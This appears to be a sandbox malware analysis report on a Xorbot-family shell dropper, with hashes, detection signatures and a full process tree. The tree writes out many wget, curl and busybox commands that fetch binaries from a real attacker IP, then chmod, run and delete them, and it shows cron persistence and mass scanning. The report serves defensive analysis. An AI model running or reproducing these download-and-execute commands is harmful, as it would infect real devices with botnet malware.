Analysis
- max time kernel: 121s
- max time network: 152s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240611-en
- resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 02/03/2025, 02:22
Static task: static1
Behavioral task behavioral1: sample 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh, resource ubuntu1804-amd64-20240729-en
Behavioral task behavioral2: sample 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh, resource debian9-mipsel-20240729-en
General
- Target: 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
- Size: 10KB
- MD5: fcba5a159c1d4a387e0b6d819ab82b13
- SHA1: aa69a7ab7c5829823641342bec0e3ad9f6fed0eb
- SHA256: 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173
- SHA512: 87a1081d1536779e44642d1951eca3e1ff3ba1fc4a333b5442c12b6fdb02b0bfff290503e160f6b95e20be6f7e007cbc9b331c7cf6ed0670cdb147c2f54b7d94
- SSDEEP: 192:SKmamvfi3B3F3x3+3e3c04kJpga5k5M5uFpY9Hvva22jXv73Q1MA+L3LTLzm+3Hy:SKmamvfi3B3F3x3+3e3c04kJpgamCJ9R
Malware Config
Signatures
- Xorbot family
  resource | yara_rule
  behavioral3/files/fstream-1.dat | family_xorbot
  behavioral3/files/fstream-3.dat | family_xorbot
  behavioral3/files/fstream-5.dat | family_xorbot
  behavioral3/files/fstream-7.dat | family_xorbot
  behavioral3/files/fstream-9.dat | family_xorbot
  behavioral3/files/fstream-11.dat | family_xorbot
- Contacts a large (1217) amount of remote hosts (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification (1 TTPs, 16 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid | Process
  872 | chmod
  982 | chmod
  1011 | chmod
  732 | chmod
  819 | chmod
  854 | chmod
  975 | chmod
  996 | chmod
  739 | chmod
  804 | chmod
  812 | chmod
  960 | chmod
  1018 | chmod
  989 | chmod
  746 | chmod
  772 | chmod
- Executes dropped EXE (16 IoCs)
  Process for every row: 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
  ioc | pid
  /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G | 733
  /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv | 740
  /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E | 747
  /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki | 774
  /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr | 805
  /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX | 813
  /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA | 821
  /tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q | 855
  /tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR | 873
  /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75 | 961
  /tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f | 976
  /tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa | 983
  /tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb | 990
  /tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q | 1001
  /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75 | 1012
  /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA | 1019
- Renames itself (1 IoCs)
  pid | Process
  822 | MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
- Creates a large amount of network flows (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- Creates/modifies Cron job (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  description | ioc | Process
  File opened for modification | /var/spool/cron/crontabs/tmp.lAyrTE | crontab
- Enumerates running processes
  Discovers information about currently running processes on the system
  Every row below is "File opened for reading"; the Process is MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA unless marked otherwise.
  /proc/947/cmdline
  /proc/1116/cmdline
  /proc/1122/cmdline
  /proc/929/cmdline
  /proc/1060/cmdline
  /proc/1104/cmdline
  /proc/1144/cmdline
  /proc/1145/cmdline
  /proc/1151/cmdline
  /proc/1178/cmdline
  /proc/10/cmdline
  /proc/369/cmdline
  /proc/381/cmdline
  /proc/877/cmdline
  /proc/973/cmdline
  /proc/994/cmdline
  /proc/1051/cmdline
  /proc/1125/cmdline
  /proc/78/cmdline
  /proc/699/cmdline
  /proc/789/cmdline
  /proc/940/cmdline
  /proc/1021/cmdline
  /proc/1133/cmdline
  /proc/1138/cmdline
  /proc/1158/cmdline
  /proc/71/cmdline
  /proc/918/cmdline
  /proc/974/cmdline
  /proc/sys/crypto/fips_enabled (Process: curl)
  /proc/1072/cmdline
  /proc/1187/cmdline
  /proc/1221/cmdline
  /proc/77/cmdline
  /proc/895/cmdline
  /proc/898/cmdline
  /proc/958/cmdline
  /proc/sys/crypto/fips_enabled (Process: curl)
  /proc/1043/cmdline
  /proc/1050/cmdline
  /proc/1185/cmdline
  /proc/981/cmdline
  /proc/1056/cmdline
  /proc/1071/cmdline
  /proc/1076/cmdline
  /proc/1088/cmdline
  /proc/1189/cmdline
  /proc/1201/cmdline
  /proc/36/cmdline
  /proc/846/cmdline
  /proc/888/cmdline
  /proc/953/cmdline
  /proc/1016/cmdline
  /proc/1022/cmdline
  /proc/1047/cmdline
  /proc/1052/cmdline
  /proc/106/cmdline
  /proc/899/cmdline
  /proc/949/cmdline
  /proc/966/cmdline
  /proc/1149/cmdline
  /proc/1152/cmdline
  /proc/1171/cmdline
  /proc/1235/cmdline
- System Network Configuration Discovery (1 TTPs, 5 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid | Process
  787 | curl
  799 | busybox
  805 | z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  807 | rm
  779 | wget
- Writes file to tmp directory (30 IoCs)
  Malware often drops required files in the /tmp directory.
  Every row below is "File opened for modification".
  ioc | Process
  /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G | wget
  /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki | wget
  /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki | curl
  /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX | curl
  /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki | busybox
  /tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR | busybox
  /tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f | busybox
  /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr | wget
  /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr | curl
  /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr | busybox
  /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX | busybox
  /tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb | busybox
  /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E | curl
  /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75 | busybox
  /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA | busybox
  /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv | busybox
  /tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q | busybox
  /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv | curl
  /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX | wget
  /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA | wget
  /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75 | busybox
  /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G | busybox
  /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv | wget
  /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E | wget
  /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E | busybox
  /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA | curl
  /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G | curl
  /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA | busybox
  /tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q | busybox
  /tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa | busybox
Processes
Each line gives the executable, its command line in quotes, its PID and, in brackets, the signatures it triggered; indentation shows the parent/child depth of the process tree.
/tmp/4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh  "/tmp/4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh"  PID:701  [Executes dropped EXE]
  /bin/rm  "/bin/rm bins.sh"  PID:705
  /usr/bin/wget  "wget http://37.44.238.92/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G"  PID:712  [Writes file to tmp directory]
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G"  PID:723  [Writes file to tmp directory]
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G"  PID:731  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G"  PID:732  [File and Directory Permissions Modification]
  /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G  "./tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G"  PID:733
  /bin/rm  "rm tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G"  PID:735
  /usr/bin/wget  "wget http://37.44.238.92/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv"  PID:736  [Writes file to tmp directory]
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv"  PID:737  [Writes file to tmp directory]
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv"  PID:738  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv"  PID:739  [File and Directory Permissions Modification]
  /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv  "./59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv"  PID:740
  /bin/rm  "rm 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv"  PID:742
  /usr/bin/wget  "wget http://37.44.238.92/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E"  PID:743  [Writes file to tmp directory]
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E"  PID:744  [Writes file to tmp directory]
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E"  PID:745  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E"  PID:746  [File and Directory Permissions Modification]
  /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E  "./l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E"  PID:747
  /bin/rm  "rm l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E"  PID:751
  /usr/bin/wget  "wget http://37.44.238.92/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki"  PID:752  [Writes file to tmp directory]
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki"  PID:759  [Writes file to tmp directory]
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki"  PID:768  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki"  PID:772  [File and Directory Permissions Modification]
  /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki  "./1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki"  PID:774
  /bin/rm  "rm 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki"  PID:777
  /usr/bin/wget  "wget http://37.44.238.92/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr"  PID:779  [System Network Configuration Discovery; Writes file to tmp directory]
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr"  PID:787  [System Network Configuration Discovery; Writes file to tmp directory]
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr"  PID:799  [System Network Configuration Discovery; Writes file to tmp directory]
  /bin/chmod  "chmod 777 z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr"  PID:804  [File and Directory Permissions Modification]
  /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr  "./z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr"  PID:805  [System Network Configuration Discovery]
  /bin/rm  "rm z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr"  PID:807  [System Network Configuration Discovery]
  /usr/bin/wget  "wget http://37.44.238.92/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX"  PID:809  [Writes file to tmp directory]
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX"  PID:810  [Writes file to tmp directory]
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX"  PID:811  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX"  PID:812  [File and Directory Permissions Modification]
  /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX  "./kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX"  PID:813
  /bin/rm  "rm kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX"  PID:815
  /usr/bin/wget  "wget http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA"  PID:816  [Writes file to tmp directory]
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA"  PID:817  [Writes file to tmp directory]
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA"  PID:818  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA"  PID:819  [File and Directory Permissions Modification]
  /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA  "./MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA"  PID:821  [Renames itself; Reads runtime system information]
    /bin/sh  "sh -c "crontab -l""  PID:823
      /usr/bin/crontab  "crontab -l"  PID:825
    /bin/sh  "sh -c "crontab -""  PID:826
      /usr/bin/crontab  "crontab -"  PID:827  [Creates/modifies Cron job]
  /bin/rm  "rm MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA"  PID:838
  /usr/bin/wget  "wget http://37.44.238.92/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q"  PID:843
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q"  PID:846
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q"  PID:848  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q"  PID:854  [File and Directory Permissions Modification]
  /tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q  "./y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q"  PID:855
  /bin/rm  "rm y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q"  PID:859
  /usr/bin/wget  "wget http://37.44.238.92/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR"  PID:860
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR"  PID:863
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR"  PID:866  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR"  PID:872  [File and Directory Permissions Modification]
  /tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR  "./wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR"  PID:873
  /bin/rm  "rm wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR"  PID:876
  /usr/bin/wget  "wget http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75"  PID:877
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75"  PID:878
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75"  PID:959  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75"  PID:960  [File and Directory Permissions Modification]
  /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75  "./MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75"  PID:961
  /bin/rm  "rm MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75"  PID:963
  /usr/bin/wget  "wget http://37.44.238.92/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f"  PID:964
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f"  PID:969
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f"  PID:970  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f"  PID:975  [File and Directory Permissions Modification]
  /tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f  "./j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f"  PID:976
  /bin/rm  "rm j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f"  PID:978
  /usr/bin/wget  "wget http://37.44.238.92/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa"  PID:979
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa"  PID:980
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa"  PID:981  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa"  PID:982  [File and Directory Permissions Modification]
  /tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa  "./7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa"  PID:983
  /bin/rm  "rm 7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa"  PID:985
  /usr/bin/wget  "wget http://37.44.238.92/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb"  PID:986
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb"  PID:987  [Reads runtime system information]
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb"  PID:988  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb"  PID:989  [File and Directory Permissions Modification]
  /tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb  "./qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb"  PID:990
  /bin/rm  "rm qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb"  PID:992
  /usr/bin/wget  "wget http://37.44.238.92/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q"  PID:993
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q"  PID:994
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q"  PID:995  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q"  PID:996  [File and Directory Permissions Modification]
  /tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q  "./ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q"  PID:1001
  /bin/rm  "rm ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q"  PID:1007
  /usr/bin/wget  "wget http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75"  PID:1008
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75"  PID:1009
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75"  PID:1010  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75"  PID:1011  [File and Directory Permissions Modification]
  /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75  "./MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75"  PID:1012
  /bin/rm  "rm MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75"  PID:1014
  /usr/bin/wget  "wget http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA"  PID:1015
  /usr/bin/curl  "curl -O http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA"  PID:1016  [Reads runtime system information]
  /bin/busybox  "/bin/busybox wget http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA"  PID:1017  [Writes file to tmp directory]
  /bin/chmod  "chmod 777 MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA"  PID:1018  [File and Directory Permissions Modification]
  /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA  "./MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA"  PID:1019
  /bin/rm  "rm MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA"  PID:1020
  /usr/bin/wget  "wget http://37.44.238.92/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q"  PID:1021
Network
MITRE ATT&CK Enterprise v15
Downloads